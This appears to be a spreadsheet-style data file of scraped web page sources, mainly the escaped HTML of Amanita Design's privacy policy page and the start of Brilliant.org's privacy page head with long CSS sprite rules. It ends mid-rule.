&lt;link rel="stylesheet" href="css/style.css?v=31"&gt;
&lt;link rel="apple-touch-icon" href="apple-touch-icon.png"&gt;
&lt;!--[if lte IE 6]&gt;&lt;link rel="stylesheet" href="css/lte-ie6.css"&gt;&lt;![endif]--&gt;
&lt;title&gt;Privacy Policy &amp;#8211; Amanita Design&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;div id="container" class="container"&gt;
    &lt;div id="wrap-header" class="wrap-header"&gt;
    &lt;div id="header" class="header"&gt;
        &lt;div id="logo" class="logo"&gt;
            &lt;h1&gt;&lt;a class='current-parent' href="index.html"&gt;Amanita Design&lt;span&gt; &lt;/span&gt;&lt;/a&gt;&lt;/h1&gt;
        &lt;/div&gt;
        &lt;input type="checkbox" id="navigation-1" class="nav-switch" &gt;
        &lt;label for="navigation-1" class="hamburger"&gt; &lt;span&gt;menu&lt;/span&gt; &lt;/label&gt;
        &lt;div class="nav"&gt;
            &lt;div class="social"&gt;
                &lt;ul&gt;
                    &lt;li&gt;&lt;a href="https://www.facebook.com/Amanita. Design" class="facebook"&gt;Facebook&lt;/a&gt;&lt;/li&gt;
                    &lt;li&gt;&lt;a href="https://www.instagram.com/amanita_design_"</t>
  </si>
  <si>
    <t>class="instagram"&gt;Instagram&lt;/a&gt;&lt;/li&gt;
                    &lt;li&gt;&lt;a href="https://twitter.com/Amanita_Design" class="twitter"&gt;Twitter&lt;/a&gt;&lt;/li&gt;
                    &lt;li&gt;&lt;a href="https://discordapp.com/invite/Gr4Ec6K" class="discord"&gt;Discord&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/c/amanitadesign/featured" class="youtube"&gt;Youtube&lt;/a&gt;&lt;/li&gt;
                &lt;/ul&gt;
             &lt;/div&gt;
            &lt;!-- /logo --&gt;
            &lt;div class="mainmenu"&gt;
                &lt;ul&gt;
                    &lt;!--</t>
  </si>
  <si>
    <t>&lt;li class="current-parent active"&gt;&lt;a href="index.html" class="current-parent menu01"&gt;Home&lt;span&gt; &lt;/span&gt;&lt;/a&gt;&lt;/li&gt; --&gt;
                    &lt;li class='current-parent'&gt;&lt;a href="index.html" class="current-parent menu01"&gt;Home&lt;span&gt;</t>
  </si>
  <si>
    <t>&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
                    &lt;li&gt;&lt;a href="about.html" class="menu02"&gt;About&lt;span&gt; &lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
                    &lt;li&gt;&lt;a href="games.html" class="menu03"&gt;Games&lt;span&gt; &lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
                    &lt;!-- &lt;li&gt;&lt;a href="store.html" class="menu04"&gt;Store&lt;span&gt; &lt;/span&gt;&lt;/a&gt;&lt;/li&gt; --&gt;
                    &lt;li&gt;&lt;a href="https://merch.amanita-design.net/" target="_blank" class="menu05"&gt;Merch&lt;span&gt;</t>
  </si>
  <si>
    <t>&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
                    &lt;!-- &lt;li&gt;&lt;a href="/blog/" class="menu06"&gt;Blog&lt;span&gt; &lt;/span&gt;&lt;/a&gt;&lt;/li&gt; --&gt;
                    &lt;!--</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="https://forum.amanita-design.net/" target="_blank" class="menu07"&gt;Forum&lt;span&gt; &lt;/span&gt;&lt;/a&gt;&lt;/li&gt; --&gt;
                    &lt;li&gt;&lt;a href="contact.html" class="menu08"&gt;Contact&lt;span&gt; &lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
                &lt;/ul&gt;
            &lt;/div&gt; &lt;!--</t>
  </si>
  <si>
    <t>/mainmenu --&gt;
        &lt;/div&gt; &lt;!-- END NAV --&gt;
    &lt;/div&gt;
    &lt;!-- /header --&gt; 
&lt;/div&gt;
&lt;!--</t>
  </si>
  <si>
    <t>/wrap-header --&gt;
    &lt;div id="wrap-content" class="wrap-content"&gt;
        &lt;hr&gt;
        &lt;!-- linka pro tisk --&gt;
        &lt;div id="content" class="videopolicy"&gt;
            &lt;h2&gt;Amanita Design Privacy Policy&lt;/h2&gt;
        &lt;p&gt; We do not collect, process or store any personal data from any of our games on any platform.&lt;/p&gt;
        &lt;p&gt;Our games collect non-personal data using integrated third-party services for achievements, leaderboards and cloud saves such as Apple iCloud and Gamecenter, Google Play services, Steam Cloud / Leaderderboards / Stats and Achievements, Nintendo Cloud saves, Sony Cloud saves / Leaderboards, Microsoft Cloud saves / Leaderboards.</t>
  </si>
  <si>
    <t>Such data are stored in these third-party services. We do not store personal or gameplay data on our servers. These services have their own privacy policies.&lt;/p&gt;
        &lt;p&gt;Our games collect, use, and disclose non-personal data from underage users in the same way as for other users, as described in this policy.</t>
  </si>
  <si>
    <t xml:space="preserve">Use of underage users’ data is limited to support internal operations of the game. Parents can learn more about how we handle data by contacting us at email address below.&lt;/p&gt;
    &lt;p&gt; We don’t use any in-app purchases (except for Chinese Android stores) and we don’t place any advertisements in our games.&lt;/p&gt;           
    </t>
  </si>
  <si>
    <t>&lt;p&gt; We use Google Analytics, Facebook Pixel and its cookies on our websites.&lt;/p&gt;
        &lt;p&gt; We use separate &lt;a href="https://checkout.shopify.com/3174813/policies/1518177"&gt;Privacy Policy&lt;/a&gt; for our &lt;a href="https://merch.amanita-design.net/"&gt;Merchandise store&lt;/a&gt; from where we process personal data.&lt;/p&gt;
    &lt;p&gt;We use separate &lt;a href="https://amanita-design.net/privacy-policy-contact-forms-newsletters.html"&gt;Privacy Policy&lt;/a&gt; for &lt;a href="https://amanita-design.net/contact.html"&gt;Contact form on this website&lt;/a&gt; from where we process personal data.&lt;/p&gt;
        &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;p&gt;Amanita Design s.r.o., Vrchlickeho sad 6, Brno, Czech Republic&lt;/p&gt;
            &lt;p&gt;Data privacy officer: Tomas Dvorak privacy@amanita-design.net&lt;/p&gt;
        &lt;!--</t>
  </si>
  <si>
    <t>&lt;/div&gt; --&gt;
        &lt;/div&gt;
        &lt;!-- /content --&gt; 
    &lt;/div&gt;
    &lt;!-- /wrap-content --&gt;
    &lt;hr&gt;
    &lt;!-- linka pro tisk --&gt; 
&lt;/div&gt;
&lt;!-- /container --&gt;
&lt;div id="wrap-footer" class="wrap-footer"&gt;
    &lt;div id="footer" class="footer"&gt;
        &lt;div class="copyright"&gt;
            &lt;p&gt;&lt;span&gt;</t>
  </si>
  <si>
    <t>Copyright © Amanita Design&lt;/span&gt;&lt;span class="divided divided--LR" &gt;All Rights Reserved.&lt;/span&gt;&lt;/p&gt;
            &lt;a class="current " href="privacy-policy.html"&gt;Privacy Policy&lt;/a&gt;
            &lt;a class="divided" href="videopolicy.html"&gt;Video Policy&lt;/a&gt; 
            &lt;a class="divided" href="https://www.facebook.com/Amanita. Design"&gt;Facebook&lt;/a&gt; 
            &lt;a class="divided" href="https://www.instagram.com/amanita_design_"&gt;Instagram&lt;/a&gt;
            &lt;a class="divided" href="https://twitter.com/Amanita_Design"&gt;Twitter&lt;/a&gt; 
            &lt;a class="divided" href="https://discord.gg/Gr4Ec6K"&gt;Discord&lt;/a&gt;
            &lt;a class="divided" href="https://www.youtube.com/user/jdamanita"&gt;YouTube&lt;/a&gt;
        &lt;/div&gt;
        &lt;button class="cookie-prefs" type="button" data-cc="c-settings"&gt;Cookie preferences&lt;/button&gt;
    &lt;/div&gt;
    &lt;!-- /footer --&gt; 
&lt;/div&gt;
&lt;!-- /wrap-footer --&gt; 
&lt;script src="js/lodash.min.js"&gt;&lt;/script&gt;
&lt;script src="js/ls.respimg.min.js"&gt;&lt;/script&gt;
&lt;script src="js/lazysizes.min.js"&gt;&lt;/script&gt;
&lt;script&gt;
        window.addEventListener('scroll', _.throttle(slideMenuUp, 250));
        // window.addEventListener('scroll', slideMenuUp);
        function slideMenuUp() {
            // if(window.pageYOffset &gt; window.innerHeight) {
            if(window.pageYOffset &gt; (window.innerHeight / 2))</t>
  </si>
  <si>
    <t>{
                document.getElementById('navigation-1').checked = false;
            }
        }
        //*/ / / / / / / / / / / 
// IOS and Android detection =&gt; ASUME MOBILE=TOUCH DEVICES
            const $isSafari = !! navigator.userAgent.match(/Version\/[\d\.]+.*Safari/);
            const $isIOS = /iPad|iPhone|iPod/.test(navigator.userAgent) &amp;&amp; !window.</t>
  </si>
  <si>
    <t>MSStream;
            const ua = navigator.userAgent.toLowerCase();
            const $isAndroid = ua.indexOf("android") &gt;</t>
  </si>
  <si>
    <t>-1; //&amp;&amp; ua.indexOf("mobile");
            // USAGE if(isDesktop())…
            function isDesktop() {
//*/ PRODUCTION
                const notMobile = (!$isIOS &amp;&amp; !$isAndroid) ? true : false;
/*/ // DEVELOPMENT
                var notMobile = (!$isSafari &amp;&amp; !$isAndroid) ?</t>
  </si>
  <si>
    <t xml:space="preserve">true : false;
//*/
                return notMobile;
            }
            // if(!isDesktop()) {
            //     $('.hide-when-ios-android').addClass('hidden');
            // }
&lt;/script&gt;
&lt;!-- Global site tag (gtag.js) - Google Analytics Amanita Design --&gt;
&lt;script type="text/plain" data-cookiecategory="analytics" async src="https://www.googletagmanager.com/gtag/js?id=UA-213084-21"&gt;&lt;/script&gt;
&lt;script type="text/plain" data-cookiecategory="analytics" defer&gt;
  </t>
  </si>
  <si>
    <t>window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'UA-213084-21');
&lt;/script&gt;
&lt;!--</t>
  </si>
  <si>
    <t>/Google Analytics --&gt;
&lt;script src="js/cookieconsent.min.js" defer&gt;&lt;/script&gt;
&lt;script src="js/cc-app.js" defer&gt;&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>Couldn't access link</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en-us"&gt;
  &lt;head&gt;
    &lt;meta http-equiv="Content-type" content="text/html; charset=utf-8"&gt;
    &lt;meta name="google" content="notranslate" /&gt;
    &lt;meta http-equiv="Content-Language" content="en_US" /&gt;
    &lt;title&gt;Privacy Policy | Brilliant&lt;/title&gt;
    &lt;meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,viewport-fit=cover"&gt;
    &lt;meta property="fb:app_id" content="326254770799145" /&gt;
    &lt;link rel="chrome-webstore-item" href="https://chrome.google.com/webstore/detail/eommhbliilafdkodaijeejngbjiiaccl"&gt;
    &lt;meta property="al:ios:app_store_id" content="913335252" /&gt;
    &lt;meta property="al:ios:app_name" content="Brilliant.org" /&gt;
    &lt;meta property="al:android:package" content="org.brilliant.android" /&gt;
    &lt;meta property="al:android:app_name" content="Brilliant" /&gt;
    &lt;meta data-vue-meta="ssr" data-vmid="al:ios:url" property="al:ios:url" content="com.brilliant. Brilliant://privacy/"&gt;&lt;meta data-vue-meta="ssr" data-vmid="al:android:url" property="al:android:url" content="https://brilliant.org/privacy/"&gt;
    &lt;link rel="apple-touch-icon-precomposed" href="/apple-touch-icon-precomposed.png"&gt;
    &lt;link rel="apple-touch-icon-precomposed" href="/apple-touch-icon-72x72-precomposed.png"&gt;
    &lt;link rel="apple-touch-icon-precomposed" href="/apple-touch-icon-76x76-precomposed.png"&gt;
    &lt;link rel="apple-touch-icon-precomposed" href="/apple-touch-icon-114x114-precomposed.png"&gt;
    &lt;link rel="apple-touch-icon-precomposed" href="/apple-touch-icon-120x120-precomposed.png"&gt;
    &lt;link rel="apple-touch-icon-precomposed" href="/apple-touch-icon-144x144-precomposed.png"&gt;
    &lt;link rel="apple-touch-icon-precomposed" href="/apple-touch-icon-152x152-precomposed.png"&gt;
    &lt;link rel="apple-touch-icon-precomposed" href="/apple-touch-icon-180x180-precomposed.png"&gt;
    &lt;!--[if lt IE 6]&gt;&lt;script type="text/javascript"&gt;var ie_version = -1;&lt;/script&gt;&lt;![endif]--&gt;
    &lt;!--[if</t>
  </si>
  <si>
    <t>IE 6]&gt;&lt;script type="text/javascript"&gt;var ie_version = 6;&lt;/script&gt;&lt;![endif]--&gt;
    &lt;!--[if IE 7]&gt;&lt;script type="text/javascript"&gt;var ie_version = 7;&lt;/script&gt;&lt;![endif]--&gt;
    &lt;!--[if IE 8]&gt;&lt;script type="text/javascript"&gt;var ie_version = 8;&lt;/script&gt;&lt;![endif]--&gt;
    &lt;!--[if</t>
  </si>
  <si>
    <t>IE 9]&gt;&lt;script type="text/javascript"&gt;var ie_version = 9;&lt;/script&gt;&lt;![endif]--&gt;
  &lt;style data-vue-ssr-id="ceb378f4:0"&gt;[class*=b-sprite-account]{background-image:url(/site_media/version-V5bd468cc063/build/sprites-v2/account.png)}@media (-webkit-min-device-pixel-ratio: 1.5), (min-resolution: 1.5dppx){[class*=b-sprite-account]{background-image:url(/site_media/version-V5bd468cc063/build/sprites-v2/account-x2.png);background-size:12px 18px}}.b-sprite-account-chevron-right-dark-blue-bold{background-position:0px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:12px;height:18px}[class*=b-sprite-art-and-design]{background-image:url(/site_media/version-V441e3e824e3/build/sprites-v2/art-and-design.png)}@media (-webkit-min-device-pixel-ratio: 1.5), (min-resolution: 1.5dppx){[class*=b-sprite-art-and-design]{background-image:url(/site_media/version-V441e3e824e3/build/sprites-v2/art-and-design-x2.png);background-size:1218px 1065px}}.b-sprite-art-and-design-astronaut-small{background-position:-948px -450px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:143px;height:178px}.b-sprite-art-and-design-astronaut{background-position:0px -340px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:293.5px;height:366px}.b-sprite-art-and-design-cell{background-position:-295.5px -340px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:181px;height:186px}.b-sprite-art-and-design-chevron-down{background-position:-1171px -213px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:14px;height:8.5px}.b-sprite-art-and-design-dog-dog{background-position:-747px -450px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:199px;height:199px}.b-sprite-art-and-design-drag-n-drop{background-position:-367px -882px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:168px;height:139px}.b-sprite-art-and-design-elephant-physics{background-position:-633px -708px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:183px;height:134px}.b-sprite-art-and-design-graph-theory{background-position:-818px -708px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:148px;height:131px}.b-sprite-art-and-design-logo{background-position:-747px -651px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:163px;height:18.5px}.b-sprite-art-and-design-moon{background-position:-1171px -169px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:42px;height:42px}.b-sprite-art-and-design-parsons{background-position:-215px -882px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:150px;height:176px}.b-sprite-art-and-design-person-person{background-position:0px -882px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:213px;height:183px}.b-sprite-art-and-design-planets{background-position:-457px -708px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:174px;height:152px}.b-sprite-art-and-design-quantum-thing{background-position:-747px -240px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:233px;height:208px}.b-sprite-art-and-design-scream-small{background-position:-1099px -169px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:70px;height:158px}.b-sprite-art-and-design-scream{background-position:-501px -344px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:140px;height:315.5px}.b-sprite-art-and-design-sun-shine{background-position:-231px -708px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:224px;height:172px}.b-sprite-art-and-design-ui-small{background-position:-747px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:350px;height:238px}.b-sprite-art-and-design-ui{background-position:0px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:499px;height:338px}.b-sprite-art-and-design-vector-field{background-position:-295.5px -528px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:201px;height:158px}.b-sprite-art-and-design-vectors{background-position:0px -708px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:229px;height:172px}.b-sprite-art-and-design-werewolf-small{background-position:-1099px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:119px;height:167px}.b-sprite-art-and-design-werewolf{background-position:-501px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:244px;height:342px}[class*=b-sprite-bits]{background-image:url(/site_media/version-V0af04715503/build/sprites-v2/bits.png)}@media (-webkit-min-device-pixel-ratio: 1.5), (min-resolution: 1.5dppx){[class*=b-sprite-bits]{background-image:url(/site_media/version-V0af04715503/build/sprites-v2/bits-x2.png);background-size:52px 52px}}.b-sprite-bits-arrow-left{background-position:0px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:16px;height:16px}.b-sprite-bits-arrow-right{background-position:-18px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:16px;height:16px}.b-sprite-bits-copy{background-position:0px -18px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:16px;height:16px}.b-sprite-bits-expand{background-position:-18px -18px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:16px;height:16px}.b-sprite-bits-more{background-position:-36px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:16px;height:16px}.b-sprite-bits-play-button-primary{background-position:-18px -36px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:13px;height:16px}.b-sprite-bits-question-mark{background-position:-36px -18px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:16px;height:16px}.b-sprite-bits-reset{background-position:0px -36px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:16px;height:16px}[class*=b-sprite-cancellation]{background-image:url(/site_media/version-V4aea97ebf43/build/sprites-v2/cancellation.png)}@media (-webkit-min-device-pixel-ratio: 1.5), (min-resolution: 1.5dppx){[class*=b-sprite-cancellation]{background-image:url(/site_media/version-V4aea97ebf43/build/sprites-v2/cancellation-x2.png);background-size:566.5px 345px}}.b-sprite-cancellation-calendar{background-position:0px -220px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:125px;height:125px}.b-sprite-cancellation-computer{background-position:-441.5px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:125px;height:111px}.b-sprite-cancellation-mail{background-position:-127px -220px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:125px;height:125px}.b-sprite-cancellation-mobile{background-position:-254px -220px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:125px;height:125px}.b-sprite-cancellation-orbit{background-position:-219.5px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:220px;height:187px}.b-sprite-cancellation-satellite{background-position:0px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:217.5px;height:218px}[class*=b-sprite-classrooms]{background-image:url(/site_media/version-V0e31c84edc3/build/sprites-v2/classrooms.png)}@media (-webkit-min-device-pixel-ratio: 1.5), (min-resolution: 1.5dppx){[class*=b-sprite-classrooms]{background-image:url(/site_media/version-V0e31c84edc3/build/sprites-v2/classrooms-x2.png);background-size:344px 314px}}.b-sprite-classrooms-dot{background-position:-181px -159px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:1.5px;height:1.5px}.b-sprite-classrooms-garbage{background-position:-174px -166px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:12.5px;height:16px}.b-sprite-classrooms-liftoff{background-position:0px -166px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:154px;height:148px}.b-sprite-classrooms-orbit{background-position:-181px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:163px;height:157px}.b-sprite-classrooms-search-icon{background-position:-156px -166px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:16px;height:16.5px}.b-sprite-classrooms-spacewalk{background-position:0px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:179px;height:164px}[class*=b-sprite-company]{background-image:url(/site_media/version-V533b3889c13/build/sprites-v2/company.png)}@media (-webkit-min-device-pixel-ratio: 1.5), (min-resolution: 1.5dppx){[class*=b-sprite-company]{background-image:url(/site_media/version-V533b3889c13/build/sprites-v2/company-x2.png);background-size:455.5px 328px}}.b-sprite-company-careers-tweet-avatar-1{background-position:-65px -253px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:52.5px;height:52.5px}.b-sprite-company-careers-tweet-avatar-2{background-position:-133px -206px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:36px;height:36px}.b-sprite-company-careers-tweet-avatar-3{background-position:-119.5px -253px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:52.5px;height:52.5px}.b-sprite-company-careers-tweet-avatar-4{background-position:-174px -253px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:52.5px;height:52.5px}.b-sprite-company-careers-tweet-illustration-1{background-position:0px -144px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:117.5px;height:60px}.b-sprite-company-careers-tweet-illustration-2{background-position:-430px -39px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:16px;height:20px}.b-sprite-company-careers-tweet-likes-1{background-position:-371.5px -39px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:56.5px;height:24px}.b-sprite-company-careers-tweet-likes-2{background-position:-318px -144px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:132px;height:24px}.b-sprite-company-icon-lesslike-1{background-position:-359.5px</t>
  </si>
  <si>
    <t>-89.5px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:26px;height:26px}.b-sprite-company-icon-lesslike-2{background-position:-387.5px -89.5px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:26px;height:26px}.b-sprite-company-icon-lesslike-3{background-position:-415.5px -89.5px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:26px;height:26px}.b-sprite-company-icon-lesslike-4{background-position:-171px -206px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:26px;height:26px}.b-sprite-company-icon-lesslike-5{background-position:-199px -206px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:26px;height:26px}.b-sprite-company-icon-lesslike-6{background-position:-227px -206px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:26px;height:26px}.b-sprite-company-icon-lesslike-7{background-position:-255px -206px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:26px;height:26px}.b-sprite-company-icon-morelike-1{background-position:-283px -206px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:26px;height:26px}.b-sprite-company-icon-morelike-2{background-position:-311px -206px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:26px;height:26px}.b-sprite-company-icon-morelike-3{background-position:-339px -206px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:26px;height:26px}.b-sprite-company-icon-morelike-4{background-position:-367px -206px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:26px;height:26px}.b-sprite-company-icon-morelike-5{background-position:-395px -206px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:26px;height:26px}.b-sprite-company-icon-morelike-6{background-position:-423px -206px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:26px;height:26px}.b-sprite-company-icon-morelike-7{background-position:-228.5px -253px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:26px;height:26px}.b-sprite-company-icon-team-art{background-position:-256.5px -253px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:26px;height:26px}.b-sprite-company-icon-team-design{background-position:-284.5px -253px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:26px;height:26px}.b-sprite-company-icon-team-engineering{background-position:-312.5px -253px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:26px;height:26px}.b-sprite-company-icon-team-interactives{background-position:-340.5px -253px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:26px;height:26px}.b-sprite-company-icon-team-marketing{background-position:-368.5px -253px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:26px;height:26px}.b-sprite-company-icon-team-operations{background-position:-396.5px -253px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:26px;height:26px}.b-sprite-company-icon-team-product{background-position:-424.5px -253px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:26px;height:26px}.b-sprite-company-publisher-apple{background-position:0px -253px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:63px;height:75px}.b-sprite-company-publisher-atlantic{background-position:0px -206px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:131px;height:45px}.b-sprite-company-publisher-microsoft{background-position:-144px -39px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:225.5px;height:48.5px}.b-sprite-company-publisher-nyt{background-position:-144px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:311.5px;height:37px}.b-sprite-company-testimonials-expert-1{background-position:0px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:142px;height:142px}.b-sprite-company-testimonials-rating{background-position:-119.5px -179.5px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:109px;height:16.5px}.b-sprite-company-testimonials-stats-rating{background-position:-144px -89.5px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:213.5px;height:34.5px}.b-sprite-company-testimonials-stats-users{background-position:-119.5px -144px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:196.5px;height:33.5px}.b-sprite-company-twitter{background-position:-371.5px -65px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:17px;height:14px}[class*=b-sprite-courses]{background-image:url(/site_media/version-Vcd4719db293/build/sprites-v2/courses.png)}@media (-webkit-min-device-pixel-ratio: 1.5), (min-resolution: 1.5dppx){[class*=b-sprite-courses]{background-image:url(/site_media/version-Vcd4719db293/build/sprites-v2/courses-x2.png);background-size:174px 154px}}.b-sprite-courses-check-green{background-position:-110px -66px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:32px;height:32px}.b-sprite-courses-chevron-1-black{background-position:-149px -100px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:6px;height:10px}.b-sprite-courses-chevron-1-white{background-position:-157px -100px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:6px;height:10px}.b-sprite-courses-chevron-2-black{background-position:-162px -66px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:11px;height:19px}.b-sprite-courses-chevron-2-white{background-position:-34px -123px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:11px;height:19px}.b-sprite-courses-chevron-3{background-position:-128px -100px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:19px;height:11px}.b-sprite-courses-chevron-tiny{background-position:-144px -88.5px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:4px;height:6px}.b-sprite-courses-course-map-big{background-position:-110px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:64px;height:64px}.b-sprite-courses-course-map{background-position:0px -123px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:32px;height:31px}.b-sprite-courses-cross{background-position:-61px -123px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:12px;height:12px}.b-sprite-courses-lock-white{background-position:-144px -66px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:16px;height:20.5px}.b-sprite-courses-lock{background-position:-47px -123px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:12px;height:14px}.b-sprite-courses-magnifier{background-position:-110px -100px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:16px;height:16px}.b-sprite-courses-no-search-results{background-position:0px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:108px;height:121px}[class*=b-sprite-forms]{background-image:url(/site_media/version-Vb17a5c52403/build/sprites-v2/forms.png)}@media (-webkit-min-device-pixel-ratio: 1.5), (min-resolution: 1.5dppx){[class*=b-sprite-forms]{background-image:url(/site_media/version-Vb17a5c52403/build/sprites-v2/forms-x2.png);background-size:14px 11px}}.b-sprite-forms-checkmark{background-position:0px 0px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:14px;height:11px}[class*=b-sprite-global]{background-image:url(/site_media/version-V8e0f3ce2993/build/sprites-v2/global.png)}@media (-webkit-min-device-pixel-ratio: 1.5), (min-resolution: 1.5dppx){[class*=b-sprite-global]{background-image:url(/site_media/version-V8e0f3ce2993/build/sprites-v2/global-x2.png);background-size:199.5px 171px}}.b-sprite-global-add{background-position:-87px -152px;background-repeat:no-repeat;overflow:hidden;display:block;text-indent:-9999px;width:14px;height:14px}.b-sprite-global-apple-app-store{background-position:0px 